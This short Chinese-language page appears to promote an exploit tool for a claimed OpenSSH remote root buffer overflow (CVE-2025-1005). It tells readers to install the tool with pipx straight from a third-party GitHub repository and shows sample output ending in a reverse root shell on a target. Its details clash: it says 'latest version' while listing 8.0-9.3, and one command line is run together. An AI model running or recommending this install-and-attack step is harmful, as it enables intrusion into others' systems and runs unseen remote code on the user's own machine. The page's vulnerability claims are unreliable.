此漏洞利用针对最新版本的 OpenSSH 中的一个关键缓冲区溢出漏洞,允许远程执行具有 root 权限的代码。
CVE ID: CVE-2025-1005
CVSS 分数: 9.8 (严重)
受影响的软件: OpenSSH 8.0-9.3
攻击向量: 网络
认证: 不需要认证
该漏洞存在于 SSH 认证处理程序中,用户提供的认证数据边界检查不足导致堆栈缓冲区溢出。通过发送一个特制的 SSH 数据包,其中包含过大的认证负载,攻击者可以覆盖返回地址并获得任意代码执行权限。
该漏洞利用了 ROP(返回导向编程)技术来绕过现代安全缓解措施,如 ASLR 和 DEP/NX 位保护。
通过你的发行版包管理器(dnf, pacman, apt 等)安装 pipx(通常称为 pipx 或 python-pipx 或 python3-pipx)
运行以下命令以安装 "ssh-exploit" 命令行工具
pipx install git+https://github.com/programmerdan92/openssh-poc-expl
export PATH="$PATH:$HOME/.local/bin"ssh-exploit
该工具会提示输入:
$ ssh-exploit
请输入目标 IP 地址: 192.168.1.100
请输入目标端口(默认 22): 22
[!] 警告:这将尝试利用 192.168.1.100:22
继续?(y/N): y
[+] 扫描目标: 192.168.1.100
[+] 端口 22 (SSH) 是开放的
[+] 检测到的 SSH 版本: OpenSSH_8.9p1
[!] 目标易受 CVE-2025-1005 的影响!
[*] 在 192.168.1.100:22 上启动缓冲区溢出攻击
[*] 制作恶意 SSH 数据包...
[*] 溢出认证缓冲区...
[*] 注入 shellcode 负载...
[*] 绕过 ASLR 保护...
[*] 提升权限...
[*] 建立反向 shell...
[+] 攻击成功!
[+] 获取 root shell!
[*] 进入交互式 shell...
root@target:~#
此工具仅供教育和授权的安全测试用途。未经授权访问计算机系统是非法且不道德的行为。